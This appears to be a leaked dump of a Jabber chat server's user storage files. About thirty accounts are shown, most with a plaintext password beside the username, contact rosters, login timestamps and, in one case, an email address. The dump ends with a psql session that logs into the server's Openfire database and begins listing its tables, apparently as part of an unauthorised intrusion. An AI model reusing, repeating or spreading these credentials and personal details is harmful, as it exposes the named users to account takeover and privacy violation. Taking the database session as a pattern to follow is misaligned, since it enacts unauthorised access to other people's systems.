<TEL><FAX/><HOME/><NUMBER/>
</TEL>
<ADR><WORK/><PCODE/>
<REGION/>
<STREET/>
<CTRY/>
<LOCALITY/>
</ADR>
<ADR><HOME/><PCODE/>
<REGION/>
<STREET/>
<CTRY/>
<LOCALITY/>
</ADR>
</vCard><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='fickmaus@jabber-swissfaking.net' name='fickmaus' subscription='both'><group>Friends</group></item><item jid='trickz@jabber-swissfaking.net' name='trickz' subscription='both'><group>Friends</group></item><item jid='the|biggie@jabber-swissfaking.net' name='the|biggie' subscription='both'><group>Friends</group></item><item jid='weareone@jabber-swissfaking.net' name='weareone' subscription='both'><group>Friends</group></item></query><query xmlns='jabber:iq:last' last='1281222880' xdbns='jabber:iq:last'>Disconnected</query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/></xdb>

cr4ck.xml
<xdb><query xmlns='jabber:iq:last' last='1280843048' xdbns='jabber:iq:last'>Registered</query><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>hahaha</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>cr4ck</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100803T13:44:08'>registered</x></query><foo xdbns='jabber:x:offline' xmlns='jabber:x:offline'><message from='jabber-swissfaking.net' to='cr4ck@jabber-swissfaking.net'>
        <subject>Welcome!</subject>
        <body>Welcome to the Jabber server -- we hope you enjoy this service! For information about how to use Jabber, visit the Jabber User's Guide at http://jabbermanual.jabberstudio.org/</body>
      <x xmlns='jabber:x:delay' from='cr4ck@jabber-swissfaking.net' stamp='20100803T13:44:08'>Offline Storage</x></message></foo></xdb>

crankz.xml
<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>muttertier11</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>crankz</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100803T09:23:54'>registered</x></query><scratchpad xmlns='scratchpad:tasks' j_private_flag='1' xdbns='scratchpad:tasks'><tasks showAll='true'/></scratchpad><foo xdbns='jabber:xdb:nslist' xmlns='jabber:xdb:nslist'><ns type='private'>scratchpad:tasks</ns></foo><vCard xmlns='vcard-temp' xdbns='vcard-temp'><PHOTO><TYPE>image/png</TYPE><BINVAL>iVBORw0KGgoAAAANSUhEUgAAAFAAAABQCAIAAAABc2X6AAAAA3NCSVQICAjb4U/gAAAXyklEQVR42sV8XY/jRpblIXlFHanoLNou72T3VA9ysL0LA9sP/dALLPZp//q+zeM...uQmCC</BINVAL></PHOTO></vCard><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='fickmaus@jabber-swissfaking.net' name='Fickmaus' subscription='to'><group>Jabber - Swissfaking</group></item><item jid='the|biggie@jabber-swissfaking.net' name='the|biggie' subscription='both'><group>Jabber - Swissfaking</group></item><item jid='trickz@jabber-swissfaking.net' name='Trickz' subscription='to'><group>Jabber - Swissfaking</group></item><item jid='hans-wurst@jabber-swissfaking.net' name='hans-wurst' subscription='both'><group>Jabber - Swissfaking</group></item><item jid='freakout@jabber-swissfaking.net' name='Freakout' subscription='both'><group>Jabber - Swissfaking</group></item><item jid='syntax\40jabber-swissfaking.net@jabber-swissfaking.net' name='Syntax' subscription='from' ask='subscribe'><group>Jabber - Swissfaking</group></item></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1281266160' xdbns='jabber:iq:last'>Disconnected</query></xdb>

cryten.xml
<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>54342101</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>cryten</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100803T11:41:15'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1280835782' xdbns='jabber:iq:last'/></xdb>

darkfunny.xml
<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>Master1993</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>darkfunny</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100804T15:07:57'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1280934820' xdbns='jabber:iq:last'/><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='weareone@jabber-swissfaking.net' name='weareone' subscription='both'><group>Friends</group></item><item jid='fickmaus@jabber-swissfaking.net' name='fickmaus' subscription='to'><group>Friends</group></item><item jid='trickz@jabber-swissfaking.net' name='trickz' subscription='both'><group>Friends</group></item><item jid='the|biggie@jabber-swissfaking.net' name='the|biggie' subscription='to' subscribe=''><group>Friends</group></item></query></xdb>

dotsyn.xml
<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>ownage</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>dotsyn</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100802T20:47:52'>registered</x></query><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='weareone@jabber-swissfaking.net' name='weareone' subscription='both'><group>Friends</group></item></query><query xmlns='jabber:iq:last' last='1281275221' xdbns='jabber:iq:last'>Replaced by new connection</query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/></xdb>

el!t3.xml
<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>huren1</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>el!t3</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100803T13:39:06'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1280843826' xdbns='jabber:iq:last'/><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='syntax\40jabber-swissfaking.net@jabber-swissfaking.net' subscription='none' subscribe='' hidden=''/></query></xdb>

fickmaus.xml
<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>t9N#1~R\dKd6</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>fickmaus</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100730T18:12:17'>registered</x></query><foo xdbns='jabber:xdb:nslist' xmlns='jabber:xdb:nslist'><ns type='private'>scratchpad:tasks</ns></foo><scratchpad xmlns='scratchpad:tasks' j_private_flag='1' xdbns='scratchpad:tasks'><tasks showAll='true'/></scratchpad><query xmlns='jabber:iq:last' last='1281226381' xdbns='jabber:iq:last'>Disconnected</query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='afroman@jabber-swissfaking.net' name='afroman' subscription='both'><group>Friends</group><group>swiss</group></item><item jid='babypanda@jabber-swissfaking.net' name='babypanda' subscription='both'><group>Friends</group><group>swiss</group></item><item jid='bullddoser@jabber-swissfaking.net' name='bullddoser' subscription='both'><group>swiss</group></item><item jid='crankz@jabber-swissfaking.net' subscription='from'><group>swiss</group></item><item jid='freakout@jabber-swissfaking.net' subscription='from'><group>swiss</group></item><item jid='hackthenet@jabber-swissfaking.net' name='hackthenet' subscription='both'><group>Friends</group><group>swiss</group></item><item jid='the|biggie@jabber-swissfaking.net' subscription='from'><group>swiss</group></item><item jid='trickz@jabber-swissfaking.net' name='trickz' subscription='both'><group>Friends</group><group>swiss</group></item><item jid='weareone@jabber-swissfaking.net' name='weareone' subscription='both'><group>Friends</group><group>swiss</group></item><item jid='syntax\40jabber-swissfaking.net@jabber-swissfaking.net' subscription='from'/><item jid='racketeer@jabber-swissfaking.net' subscription='from'/><item jid='darkfunny@jabber-swissfaking.net' subscription='from'/><item jid='conference.localhost' subscription='from' ask='subscribe'/><item jid='glycerin\40jabber-swissfaking.net@jabber-swissfaking.net' name='glycerin@jabber-swissfaking.net' subscription='both'><group>Friends</group></item></query></xdb>

flash.xml
<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>12SchneSi</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>flash</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100804T19:24:16'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1280949991' xdbns='jabber:iq:last'/></xdb>

freakout.xml
<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>Ghana11</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>freakout</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100803T10:13:13'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1280922217' xdbns='jabber:iq:last'/><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='fickmaus@jabber-swissfaking.net' name='Fickmaus' subscription='to'><group>Friends</group></item><item jid='trickz@jabber-swissfaking.net' name='Trickz' subscription='to'><group>Friends</group></item><item jid='afroman@jabber-swissfaking.net' name='Afroman' subscription='to'><group>Friends</group></item><item jid='babypanda@jabber-swissfaking.net' name='BabyPanda' subscription='to'><group>Friends</group></item><item jid='s0xtech@jabber-swissfaking.net' name='s0xtech' subscription='to'><group>Friends</group></item><item jid='the|biggie@jabber-swissfaking.net' name='the|biggie' subscription='both'><group>Friends</group></item><item jid='crankz@jabber-swissfaking.net' name='Crankz' subscription='both'><group>Friends</group></item><item jid='hans-wurst@jabber-swissfaking.net' name='hans-wurst' subscription='both'><group>Friends</group></item><item jid='syntax\40jabber-swissfaking.net@jabber-swissfaking.net' subscription='none' subscribe='' hidden=''/></query></xdb>

glycerin\40jabber-swissfaking.net.xml
<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>kevin123</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>glycerin\40jabber-swissfaking.net</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100808T11:37:30'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='babypanda@jabber-swissfaking.net' name='BabyPanda' subscription='none' ask='subscribe'><group>Friends</group></item><item jid='the|biggie@jabber-swissfaking.net' name='the|biggie' subscription='none' ask='subscribe'><group>Friends</group></item><item jid='naik@jabber-swissfaking.net' name='naik' subscription='none' ask='subscribe'><group>Friends</group></item><item jid='theird21@jabber-swissfaking.net' name='theird21' subscription='none' ask='subscribe'><group>Friends</group></item><item jid='racketeer@jabber-swissfaking.net' name='Racketeer' subscription='both'><group>Friends</group></item><item jid='fickmaus@jabber-swissfaking.net' name='fickmaus' subscription='both'><group>Friends</group></item></query><query xmlns='jabber:iq:last' last='1281295248' xdbns='jabber:iq:last'/></xdb>

hackthenet.xml
<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>sonne123</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>hackthenet</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100802T21:49:48'>registered</x></query><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='fickmaus@jabber-swissfaking.net' name='fickmaus' subscription='both'><group>Friends</group></item><item jid='afroman@jabber-swissfaking.net' name='afroman' subscription='both'><group>Friends</group></item><item jid='babypanda@jabber-swissfaking.net' name='babypanda' subscription='both'><group>Friends</group></item></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1280918275' xdbns='jabber:iq:last'/></xdb>

hans-wurst.xml
<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>volkan</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>hans-wurst</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100803T09:45:39'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1280956100' xdbns='jabber:iq:last'>Disconnected</query><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='afroman@jabber-swissfaking.net' name='afroman' subscription='to'><group>Swiss</group></item><item jid='trickz@jabber-swissfaking.net' name='trickz' subscription='to'><group>Swiss</group></item><item jid='babypanda@jabber-swissfaking.net' name='BabyPanda' subscription='to'><group>Swiss</group></item><item jid='s0xtech@jabber-swissfaking.net' name='s0xtech' subscription='to'><group>Swiss</group></item><item jid='the|biggie@jabber-swissfaking.net' name='the|biggie' subscription='both'><group>Swiss</group></item><item jid='crankz@jabber-swissfaking.net' name='crankz' subscription='both'><group>Swiss</group></item><item jid='freakout@jabber-swissfaking.net' name='FreakOut' subscription='both'><group>Swiss</group></item><item jid='syntax\40jabber-swissfaking.net@jabber-swissfaking.net' subscription='from'/></query></xdb>

holzmen.xml
<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>jabing</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>holzmen</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100804T12:52:11'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1280955549' xdbns='jabber:iq:last'/></xdb>

jamyla\40jabber-swissfaking.net.xml
<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>2wsx6zhn</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>jamyla\40jabber-swissfaking.net</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100802T20:58:39'>registered</x></query><scratchpad xmlns='scratchpad:tasks' j_private_flag='1' xdbns='scratchpad:tasks'><tasks showAll='true'/></scratchpad><foo xdbns='jabber:xdb:nslist' xmlns='jabber:xdb:nslist'><ns type='private'>scratchpad:tasks</ns></foo><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1281209105' xdbns='jabber:iq:last'/></xdb>

kappy777.xml
<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>kappy777</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>kappy777</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100730T17:44:43'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1280513424' xdbns='jabber:iq:last'/></xdb>

kluless.xml
<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>wtf!1337</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>kluless</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100805T11:37:20'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1281008315' xdbns='jabber:iq:last'/></xdb>

luigi100.xml
<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>frauke</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>luigi100</username><name/><email/><x xmlns='jabber:x:delay' stamp='20100803T03:25:49'>registered</x></query><query xmlns='jabber:iq:last' last='1281300897' xdbns='jabber:iq:last'>Replaced by new connection</query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/></xdb>

naik.xml
<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>c15g4</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>naik</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100803T13:15:20'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1281007640' xdbns='jabber:iq:last'/><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='annie90@jabber.ccc.de' name='' subscription='both'><group>Jabber</group></item><item jid='syntax\40jabber-swissfaking.net@jabber-swissfaking.net' name='' subscription='from' ask='subscribe'><group>Buddies</group></item><item jid='glycerin\40jabber-swissfaking.net@jabber-swissfaking.net' subscription='none' subscribe='' hidden=''/></query></xdb>

nitex.xml
<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>19083862</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>nitex</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100802T20:37:54'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1281271005' xdbns='jabber:iq:last'/></xdb>

racketeer.xml
<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>neumsche</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>racketeer</username><name/><email/><x xmlns='jabber:x:delay' stamp='20100803T13:32:38'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='fickmaus@jabber-swissfaking.net' name='' subscription='to'><group>swiss</group></item><item jid='glycerin\40jabber-swissfaking.net@jabber-swissfaking.net' name='' subscription='both'><group>swiss</group></item></query><query xmlns='jabber:iq:last' last='1281291383' xdbns='jabber:iq:last'>Disconnected</query></xdb>

s0xtech.xml
<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>s0xy00</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>s0xtech</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100803T07:19:17'>registered</x></query><query xmlns='jabber:iq:last' last='1280825558' xdbns='jabber:iq:last'/><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='trickz@jabber-swissfaking.net' name='trickz' subscription='to'><group>Friends</group></item><item jid='afroman@jabber-swissfaking.net' name='afroman' subscription='to'><group>Friends</group></item><item jid='babypanda@jabber-swissfaking.net' name='BabyPanda' subscription='to'><group>Friends</group></item><item jid='hans-wurst@jabber-swissfaking.net' subscription='from'/><item jid='freakout@jabber-swissfaking.net' subscription='from'/><item jid='syntax\40jabber-swissfaking.net@jabber-swissfaking.net' subscription='from'/></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/></xdb>

sinned.xml
<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>vollidiot</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>sinned</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100803T19:03:31'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1280862994' xdbns='jabber:iq:last'/></xdb>

st3ffl0r.xml
<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>HanZ123</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>st3ffl0r</username><name>Ich</name><email>iamweasel@marsmail.de</email><x xmlns='jabber:x:delay' stamp='20100805T11:28:40'>registered</x></query><vCard xmlns='vcard-temp' xdbns='vcard-temp'><PHOTO><TYPE>image/png</TYPE><BINVAL>iVBORw0KGgoAAAANSUhEUgAAAF8AAABgCAIAAAD0AjnaAAAAA3NCSVQICAjb4U/gAAAgAElEQVR42oy8WZM...Mv9pCZHqyIEyWcPpVmUv22TEF3l1Kny8Js4m7WTLwiBvyVZn+a5hF/ENYv/jETXn6+WbfO0vYK7nQ1q+MOm5Hc8Nuu23wn2TSuNvKNqKcLc8efYMALyFjEOFaAQHV45gl85/x2yGLznPZ6jM75ju8LsTILanf/GAL4Ybff0qZ9Y8DcN5tCO3/QgU3B1qvXv3n9cgfNLl5Yvlb3PGXttQkAzPbZSNvvmq5yDV8b+PHjYIo8n1+vLpv2es77Hg1wvny59K8JuP+T9PTAv9D/H9sBRgei4KAAAAAElFTkSuQmCC</BINVAL></PHOTO></vCard><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1281011278' xdbns='jabber:iq:last'>Disconnected</query></xdb>

syntax\40jabber-swissfaking.net.xml
<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>seckin!kilic!91</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>syntax\40jabber-swissfaking.net</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100804T12:44:55'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'><message id='IoS3Q-21' to='syntax\40jabber-swissfaking.net@jabber-swissfaking.net' from='naik@jabber-swissfaking.net/spark'><x xmlns='jabber:x:event'/><x xmlns='jabber:x:delay' from='syntax\40jabber-swissfaking.net@jabber-swissfaking.net' stamp='20100805T11:07:06'>Offline Storage</x></message></foo><query xmlns='jabber:iq:last' last='1280928948' xdbns='jabber:iq:last'/><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='fickmaus@jabber-swissfaking.net' name='fickmaus' subscription='to'><group>Swiss</group></item><item jid='trickz@jabber-swissfaking.net' name='trickz' subscription='to'><group>Swiss</group></item><item jid='afroman@jabber-swissfaking.net' name='afroman' subscription='none' ask='subscribe'><group>Swiss</group></item><item jid='babypanda@jabber-swissfaking.net' name='BabyPanda' subscription='to'><group>Swiss</group></item><item jid='s0xtech@jabber-swissfaking.net' name='s0xtech' subscription='to'><group>Swiss</group></item><item jid='the|biggie@jabber-swissfaking.net' name='the|biggie' subscription='both'><group>Swiss</group></item><item jid='crankz@jabber-swissfaking.net' name='Crankz' subscription='to' subscribe=''><group>Swiss</group></item><item jid='hans-wurst@jabber-swissfaking.net' name='hans-wurst' subscription='to'><group>Swiss</group></item><item jid='freakout@jabber-swissfaking.net' name='FreakOut' subscription='none' ask='subscribe'><group>Swiss</group></item><item jid='naik@jabber-swissfaking.net' name='naik' subscription='to' subscribe=''><group>Swiss</group></item><item jid='el!t3@jabber-swissfaking.net' name='eL!t3' subscription='none' ask='subscribe'><group>Swiss</group></item><item jid='yaboybigt@jabber-swissfaking.net' name='yaboybigT' subscription='to'><group>Swiss</group></item><item jid='theird21@jabber-swissfaking.net' name='theird21' subscription='both'><group>Swiss</group></item><item jid='syntex@jabber-swissfaking.net' name='syntex' subscription='both'><group>Swiss</group></item></query></xdb>

syntex.xml
<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>swissjabber</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>syntex</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100804T12:33:58'>registered</x></query><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='syntax\40jabber-swissfaking.net@jabber-swissfaking.net' name='syntax@jabber-swissfaking.net' subscription='both'><group>Friends</group></item></query><query xmlns='jabber:iq:last' last='1281301960' xdbns='jabber:iq:last'>Replaced by new connection</query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/></xdb>

theird21.xml
<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>00025879</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>theird21</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100803T13:05:17'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1280927487' xdbns='jabber:iq:last'/><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='syntax\40jabber-swissfaking.net@jabber-swissfaking.net' name='syntax@jabber-swissfaking.net' subscription='both'><group>Friends</group></item><item jid='glycerin\40jabber-swissfaking.net@jabber-swissfaking.net' subscription='none' subscribe='' hidden=''/></query></xdb>

the|biggie.xml
<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>aggro123</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>the|biggie</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100730T20:33:39'>registered</x></query><query xmlns='jabber:iq:last' last='1280970373' xdbns='jabber:iq:last'>Replaced by new connection</query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='fickmaus@jabber-swissfaking.net' name='fickmaus' subscription='to'><group>Friends</group></item><item jid='trickz@jabber-swissfaking.net' name='trickz' subscription='to'><group>Friends</group></item><item jid='bullddoser@jabber-swissfaking.net' name='bullddoser' subscription='both'><group>Friends</group></item><item jid='babypanda@jabber-swissfaking.net' name='BabyPanda' subscription='to'><group>Friends</group></item><item jid='weareone@jabber-swissfaking.net' name='weareone' subscription='both'><group>Friends</group></item><item jid='crankz@jabber-swissfaking.net' name='crankz' subscription='both'><group>Friends</group></item><item jid='hans-wurst@jabber-swissfaking.net' name='hans-wurst' subscription='both'><group>Friends</group></item><item jid='freakout@jabber-swissfaking.net' name='freakout' subscription='both'><group>Friends</group></item><item jid='syntax\40jabber-swissfaking.net@jabber-swissfaking.net' name='syntax@jabber-swissfaking.net' subscription='both'><group>Friends</group></item><item jid='darkfunny@jabber-swissfaking.net' name='darkfunny' subscription='from' ask='subscribe'><group>Friends</group></item><item jid='glycerin\40jabber-swissfaking.net@jabber-swissfaking.net' subscription='none' subscribe='' hidden=''/></query></xdb>

trickz.xml
<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>crazyfrog1234</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>trickz</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100730T21:41:38'>registered</x></query><res id='spark'/><scratchpad xmlns='scratchpad:tasks' j_private_flag='1' xdbns='scratchpad:tasks'><tasks showAll='true'/></scratchpad><foo xdbns='jabber:xdb:nslist' xmlns='jabber:xdb:nslist'><ns type='private'>scratchpad:tasks</ns></foo><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='fickmaus@jabber-swissfaking.net' name='fickmaus' subscription='both'><group>Friends</group></item><item jid='bullddoser@jabber-swissfaking.net' name='bullddoser' subscription='both'><group>Friends</group></item><item jid='the|biggie@jabber-swissfaking.net' name='the|biggie' subscription='from'/><item jid='afroman@jabber-swissfaking.net' name='afroman' subscription='both'><group>Friends</group></item><item jid='weareone@jabber-swissfaking.net' name='weareone' subscription='both'><group>Friends</group></item><item jid='babypanda@jabber-swissfaking.net' subscription='from'/><item jid='s0xtech@jabber-swissfaking.net' subscription='from'/><item jid='crankz@jabber-swissfaking.net' subscription='from'/><item jid='hans-wurst@jabber-swissfaking.net' subscription='from'/><item jid='freakout@jabber-swissfaking.net' subscription='from'/><item jid='syntax\40jabber-swissfaking.net@jabber-swissfaking.net' subscription='from'/><item jid='darkfunny@jabber-swissfaking.net' name='darkfunny' subscription='both'><group>Friends</group></item></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1281303248' xdbns='jabber:iq:last'>Disconnected</query></xdb>

w!cked.xml
<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>fvcxy--</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>w!cked</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100803T16:19:22'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1280852527' xdbns='jabber:iq:last'>Disconnected</query></xdb>

w00dka.xml
<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>as_tave_myliu</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>w00dka</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100804T18:07:26'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1281222732' xdbns='jabber:iq:last'/></xdb>

weareone.xml
<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>Amstaff</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>weareone</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100802T20:30:36'>registered</x></query><res id='spark'/><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='trickz@jabber-swissfaking.net' name='trickz' subscription='both'><group>Friends</group></item><item jid='afroman@jabber-swissfaking.net' name='afroman' subscription='to'><group>Friends</group></item><item jid='fickmaus@jabber-swissfaking.net' name='fickmaus' subscription='both'><group>Friends</group></item><item jid='bullddoser@jabber-swissfaking.net' name='bullddoser' subscription='both'><group>Friends</group></item><item jid='dotsyn@jabber-swissfaking.net' name='dotsyn' subscription='both'><group>Friends</group></item><item jid='the|biggie@jabber-swissfaking.net' name='the|biggie' subscription='both'><group>Friends</group></item><item jid='donteron@thesecure.biz' subscription='from'/><item jid='darkfunny@jabber-swissfaking.net' name='darkfunny' subscription='both'><group>Friends</group></item></query><query xmlns='jabber:iq:last' last='1280970363' xdbns='jabber:iq:last'>Replaced by new connection</query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/></xdb>

yaboybigt.xml
<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>73818444</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>yaboybigt</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100803T14:05:19'>registered</x></query><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='syntax\40jabber-swissfaking.net@jabber-swissfaking.net' subscription='from'/></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1281277327' xdbns='jabber:iq:last'/></xdb>

# psql openfire openfire
Password for user openfire: 
Welcome to psql 8.3.11, the PostgreSQL interactive terminal.

openfire=# \l
        List of databases
   Name    |  Owner   | Encoding  
-----------+----------+-----------
 openfire  | openfire | UTF8
 postgres  | postgres | SQL_ASCII
 template0 | postgres | SQL_ASCII
 template1 | postgres | SQL_ASCII
(4 rows)

openfire=# \c openfire
You are now connected to database "openfire".
openfire=# \d
                List of relations
 Schema |         Name         | Type  |  Owner   
--------+----------------------+-------+----------
 public | ofconparticipant     | table | openfire
 public | ofconversation       | table | openfire
 public | ofextcomponentconf   | table | openfire
 public | ofgroup              | table | openfire
